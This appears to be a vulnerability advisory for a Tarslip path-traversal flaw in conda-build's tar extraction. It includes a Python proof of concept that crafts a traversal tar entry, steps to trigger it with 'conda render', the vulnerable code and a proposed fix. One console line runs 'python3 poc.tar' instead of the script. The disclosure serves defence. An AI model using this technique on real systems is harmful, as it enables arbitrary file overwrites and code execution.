The conda-build processing logic is vulnerable to path traversal (Tarslip) attacks due to improper sanitization of tar entry paths. Attackers can craft tar archives containing entries with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt) to write files outside the intended extraction directory. This could lead to arbitrary file overwrites, privilege escalation, or code execution if sensitive locations (e.g., ~/.bashrc) are targeted.
The severity is reduced because exploitation requires user interaction (processing a malicious tar file) and the ability to predict or target sensitive filesystem locations, conditions common in shared environments such as multi-user systems or CI/CD pipelines. While crafting a tar file with traversal sequences (e.g., ../../malicious.sh) is trivial, successful exploitation hinges on overwriting files in predictable or privileged paths (e.g., user configuration directories). If achieved, this could lead to arbitrary code execution by modifying executables, shell profiles (e.g., .bashrc), or cron jobs. The risk mirrors historical Tarslip flaws like CVE-2007-4559, where unvalidated tar extraction enabled systemic compromise despite requiring user action.
The following PoC demonstrates how a malicious tar file can be extracted to an arbitrary location via the conda render command:

```python
import io
import os
import tarfile

malicious_content = b"This is a malicious file!\n"

with tarfile.open("poc.tar", "w") as f:
    # The entry name carries a traversal sequence; tarfile.addfile() writes it verbatim.
    tarinfo = tarfile.TarInfo(name="../../../../../var/run/shm/poc.txt")
    tarinfo.size = len(malicious_content)
    f.addfile(tarinfo, fileobj=io.BytesIO(malicious_content))
```
Steps:
- Generate a malicious tar file using the provided Python script.
- Run `conda render poc.tar`
- Observe that /var/run/shm/poc.txt is created with attacker-controlled content.

Output:

```console
$ python3 poc.tar
$ conda render poc.tar
WARNING: Number of parsed outputs does not match detected raw metadata blocks. Identified output block may be wrong! If you are using Jinja conditionals to include or exclude outputs, consider using `skip: true # [condition]` instead.
[...]
$ cat /var/run/shm/poc.txt
This is a malicious file!
```
Affected Files:
- https://github.com/conda/conda-build/[...]/conda_build/convert.py
- https://github.com/conda/conda-build/[...]/conda_build/render.py

conda-build/conda_build/render.py, lines 989 to 993 in 834448b:

```python
elif recipe.suffixes in [[".tar"], [".tar", ".gz"], [".tgz"], [".tar", ".bz2"]]:
    # extract the recipe to a temporary directory
    with TemporaryDirectory() as tmp, tarfile.open(recipe, "r:*") as tar:
        tar.extractall(path=tmp)
        yield Path(tmp)
```
The vulnerability stems from insecure tar extraction logic in conda-build which uses tar.extractall() without sanitizing tar entry paths. This allows attackers to craft tar files with directory traversal sequences (e.g., ../../../../../var/run/shm/poc.txt). When processed by conda-build, these entries escape the intended extraction directory and write files to arbitrary locations.
Proposed Fix:
The remediation involves modernizing the tar extraction logic across conda-build by leveraging Python’s built-in safeguards wherever possible. For Python versions ≥3.12, using tar.extractall(path=target_dir, filter='data') is recommended, as this approach inherently blocks directory traversal attempts through its filtering mechanism.
For earlier Python versions, it is advisable to implement a dedicated sanitization function (e.g., safe_extract) that normalizes each tar entry’s path and verifies that the resolved absolute path remains within the intended target directory using os.path.abspath. This consistent methodology replaces ad-hoc or incomplete checks and should be uniformly applied across conda-build and any other modules handling tar extraction, thereby ensuring robust defense against malicious path manipulations.